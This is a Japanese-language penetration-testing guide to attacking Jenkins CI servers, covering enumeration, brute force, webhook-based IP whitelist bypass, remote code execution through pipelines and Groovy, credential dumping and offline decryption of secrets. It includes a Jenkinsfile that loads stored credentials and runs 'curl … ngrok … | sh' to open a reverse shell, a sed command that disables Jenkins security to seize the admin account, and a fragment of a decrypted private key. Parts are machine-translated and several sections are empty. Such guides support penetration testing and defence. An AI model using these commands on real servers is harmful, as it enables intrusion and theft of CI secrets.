Jenkins Security

基本情報

Jenkinsは、パイプラインを使用して、ほぼすべてのプログラミング言語とソースコードリポジトリの継続的インテグレーションまたは継続的デリバリー（CI/CD）環境を確立するための簡単な方法を提供するツールです。さらに、さまざまなルーチン開発タスクを自動化します。Jenkinsは個々のステップのためのスクリプトを作成する必要性を排除するわけではありませんが、手動で簡単に構築できるよりも、ビルド、テスト、デプロイメントツールの全シーケンスを統合するためのより迅速で堅牢な方法を提供します。

認証されていない列挙

認証なしで興味深いJenkinsページ（_ /people_や_ /asynchPeople_など、現在のユーザーをリストします）を検索するには、次のようにします:

msf> use auxiliary/scanner/http/jenkins_enum

認証なしでコマンドを実行できるか確認してください：

msf> use auxiliary/scanner/http/jenkins_command

認証情報がない場合、/asynchPeople/ パスまたは /securityRealm/user/admin/search/index?q= で ユーザー名 を確認できます。

/oops または /error パスから Jenkins のバージョンを取得できるかもしれません。

既知の脆弱性

GitHub - gquere/pwn_jenkins: Notes about attacking Jenkins serversGitHub

ログイン

基本情報では、Jenkins 内でログインするためのすべての方法を確認できます：

登録

アカウントを作成してログインできる Jenkins インスタンスを見つけることができます。とても簡単です。

SSO ログイン

また、SSO 機能/プラグイン が存在する場合は、テストアカウント（例：テスト Github/Bitbucket アカウント）を使用してアプリケーションにログインを試みるべきです。こちらのトリックを参照してください。

ブルートフォース

Jenkins は パスワードポリシー と ユーザー名のブルートフォース緩和 が欠けています。弱いパスワードやユーザー名をパスワードとして使用することがあるため、ユーザーをブルートフォースすることが重要です。逆のユーザー名をパスワードとして使用することもあります。

msf> use auxiliary/scanner/http/jenkins_login

パスワードスプレー

このpythonスクリプトまたはこのpowershellスクリプトを使用してください。

IPホワイトリストバイパス

多くの組織は、GitHubやGitLabのようなSaaSベースのソース管理（SCM）システムを、JenkinsやTeamCityのような内部の自己ホスト型CIソリューションと組み合わせています。このセットアップにより、CIシステムはSaaSソース管理ベンダーからのウェブフックイベントを受信し、主にパイプラインジョブをトリガーすることができます。

これを実現するために、組織はSCMプラットフォームのIP範囲をホワイトリストに登録し、ウェブフックを介して内部CIシステムにアクセスできるようにしています。しかし、誰でもGitHubやGitLabにアカウントを作成し、ウェブフックをトリガーするように設定できるため、内部CIシステムにリクエストを送信する可能性があります。

確認してください: https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/

内部Jenkinsの悪用

これらのシナリオでは、Jenkinsにアクセスするための有効なアカウントを持っていると仮定します。

詳細については、基本情報を確認してください：

ユーザーのリスト表示

Jenkinsにアクセスした場合、http://127.0.0.1:8080/asynchPeople/で他の登録ユーザーをリスト表示できます。

プレーンテキストの秘密を見つけるためのビルドダンプ

このスクリプトを使用して、ビルドコンソール出力とビルド環境変数をダンプし、プレーンテキストの秘密を見つけることを期待します。

python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps
cd build_dumps
gitleaks detect --no-git -v

SSH資格情報の盗難

もし侵害されたユーザーが新しいJenkinsノードを作成/変更するのに十分な権限を持っている場合、SSH資格情報が他のノードにアクセスするためにすでに保存されていると、彼はホストを設定して資格情報を記録することによってそれらの資格情報を盗むことができます。ホストキーを検証せずに:

通常、JenkinsのSSH資格情報はグローバルプロバイダー（/credentials/）に見つかるので、他の秘密をダンプするのと同様にそれらをダンプすることもできます。詳細は秘密のダンプセクションを参照してください。

JenkinsにおけるRCE

Jenkinsサーバーでシェルを取得することは、攻撃者にすべての秘密や環境変数を漏洩させ、同じネットワークにある他のマシンを悪用する機会を与え、さらにはクラウド資格情報を収集することができます。

デフォルトでは、JenkinsはSYSTEMとして実行されます。したがって、それを侵害することで攻撃者はSYSTEM権限を得ることになります。

プロジェクトの作成/変更によるRCE

プロジェクトを作成/変更することは、Jenkinsサーバー上でRCEを取得する方法です:

Groovyスクリプトの実行によるRCE

Groovyスクリプトを実行することでRCEを取得することもでき、これは新しいプロジェクトを作成するよりも目立たないかもしれません:

パイプラインの作成/変更によるRCE

パイプラインを作成/変更することでRCEを取得することもできます:

パイプラインの悪用

パイプラインを悪用するには、Jenkinsへのアクセスが必要です。

ビルドパイプライン

パイプラインはプロジェクトのビルドメカニズムとしても使用でき、その場合、パイプライン構文を含むリポジトリ内のファイルを設定できます。デフォルトでは/Jenkinsfileが使用されます:

他の場所（例えば他のリポジトリ）にパイプライン設定ファイルを保存することも可能で、リポジトリアクセスとパイプラインアクセスを分離することを目的としています。

攻撃者がそのファイルに対する書き込みアクセスを持っている場合、彼はそれを変更し、Jenkinsにアクセスせずにパイプラインをトリガーすることができるでしょう。 攻撃者はいくつかのブランチ保護を回避する必要があるかもしれません（プラットフォームやユーザー権限によっては回避できる場合もあります）。

カスタムパイプラインを実行するための最も一般的なトリガーは次のとおりです:

• メインブランチへのプルリクエスト（または他のブランチへのプルリクエスト）

• メインブランチへのプッシュ（または他のブランチへのプッシュ）

• メインブランチの更新を行い、何らかの方法で実行されるのを待つ

パイプラインRCE

前のRCEセクションでは、パイプラインを変更することでRCEを取得する技術がすでに示されています。

環境変数の確認

平文の環境変数をパイプライン全体または特定のステージのために宣言することが可能です。これらの環境変数は機密情報を含むべきではありませんが、攻撃者は常にすべてのパイプライン設定/Jenkinsfileを確認することができます:

pipeline {
agent {label 'built-in'}
environment {
GENERIC_ENV_VAR = "Test pipeline ENV variables."
}

stages {
stage("Build") {
environment {
STAGE_ENV_VAR = "Test stage ENV variables."
}
steps {

秘密のダンプ

Jenkinsが秘密を通常どのように扱うかについての情報は、基本情報を確認してください：

資格情報はグローバルプロバイダー（/credentials/）または特定のプロジェクト（/job/<project-name>/configure）にスコープを設定できます。したがって、すべての秘密を抽出するには、秘密を含むすべてのプロジェクトを少なくとも侵害する必要があり、カスタム/毒入りパイプラインを実行する必要があります。

もう一つの問題は、パイプラインのenv内の秘密を取得するには、秘密の名前とタイプを知っている必要があることです。たとえば、usernamePassword 秘密を**string** 秘密としてロードしようとすると、このエラーが発生します：

ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected

ここでは、一般的な秘密の種類をロードする方法を示します：

withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) {
sh '''
env #Search for USERNAME and PASS
'''
}

withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) {
sh '''
env #Search for SECRET
'''
}

withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) {
sh '''
env # Search for USERPASS
'''
}

# You can also load multiple env variables at once
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
sh '''
env
'''
}

このページの最後にすべての認証情報の種類を見つけることができます: https://www.jenkins.io/doc/pipeline/steps/credentials-binding/

トリガー

ドキュメントから: triggersディレクティブは、パイプラインが再トリガーされる自動化された方法を定義します。GitHubやBitBucketなどのソースと統合されたパイプラインの場合、triggersは必要ないかもしれません。なぜなら、ウェブフックベースの統合がすでに存在する可能性が高いからです。現在利用可能なトリガーはcron、pollSCM、およびupstreamです。

Cronの例:

triggers { cron('H */4 * * 1-5') }

Check other examples in the docs.

Nodes & Agents

A Jenkins instance might have different agents running in different machines. From an attacker perspective, access to different machines means different potential cloud credentials to steal or different network access that could be abuse to exploit other machines.

For more information check the basic information:

You can enumerate the configured nodes in /computer/, you will usually find the Built-In Node (which is the node running Jenkins) and potentially more:

It is 特に興味深いのはBuilt-Inノードを妥協することです。なぜなら、それには敏感なJenkins情報が含まれているからです。

To indicate you want to run the pipeline in the built-in Jenkins node you can specify inside the pipeline the following config:

pipeline {
agent {label 'built-in'}

完全な例

特定のエージェントでのパイプライン、cronトリガーを使用し、パイプラインとステージの環境変数を持ち、ステップで2つの変数を読み込み、リバースシェルを送信します:

pipeline {
agent {label 'built-in'}
triggers { cron('H */4 * * 1-5') }
environment {
GENERIC_ENV_VAR = "Test pipeline ENV variables."
}

stages {
stage("Build") {
environment {
STAGE_ENV_VAR = "Test stage ENV variables."
}
steps {
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
'''
}
}
}

post {
always {
cleanWs()
}
}
}

任意ファイル読み取りからRCEへ

RCE

ポストエクスプロイト

Metasploit

msf> post/multi/gather/jenkins_gather

Jenkins Secrets

/credentials/ にアクセスすることで、十分な権限があればシークレットをリストできます。これは credentials.xml ファイル内のシークレットのみをリストしますが、ビルド構成ファイルにも さらに多くの資格情報が含まれている可能性があります。

各プロジェクトの構成を表示できる場合、リポジトリにアクセスするために使用されている 資格情報（シークレット）の名前や プロジェクトの他の資格情報もそこに表示されます。

From Groovy

From disk

これらのファイルは Jenkinsシークレットを復号化するために必要です：

• secrets/master.key

• secrets/hudson.util.Secret

そのような シークレットは通常次の場所にあります：

• credentials.xml

• jobs/.../build.xml

• jobs/.../config.xml

これらを見つけるための正規表現は次のとおりです：

# Find the secrets
grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
# Print only the filenames where the secrets are located
grep -lre "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"

# Secret example
credentials.xml: <secret>{AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==}</secret>

Jenkinsの秘密をオフラインで復号化する

秘密を復号化するために必要なパスワードをダンプした場合、このスクリプト を使用してそれらの秘密を復号化します。

python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
06165DF2-C047-4402-8CAB-1C8EC526C115
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAt985Hbb8KfIImS6dZlVG6swiotCiIlg/P7aME9PvZNUgg2Iyf2FT

GroovyからJenkinsの秘密を復号化する

println(hudson.util.Secret.decrypt("{...}"))

新しい管理者ユーザーを作成する

1. /var/lib/jenkins/config.xml または C:\Program Files (x86)\Jenkins\ にある Jenkins config.xml ファイルにアクセスします。

2. <useSecurity>true</useSecurity>という単語を検索し、**trueをfalse**に変更します。

3. sed -i -e 's/<useSecurity>true</<useSecurity>false</g' config.xml

4. Jenkins サーバーを再起動します: service jenkins restart

5. もう一度 Jenkins ポータルに移動すると、Jenkins は認証情報を要求しません。管理 Jenkinsに移動して、管理者パスワードを再設定します。

6. 設定を <useSecurity>true</useSecurity> に変更して、再度 Jenkins のセキュリティを有効にし、再起動します。

参考文献

• https://github.com/gquere/pwn_jenkins

• https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/

• https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password

• https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html

• https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072

• https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3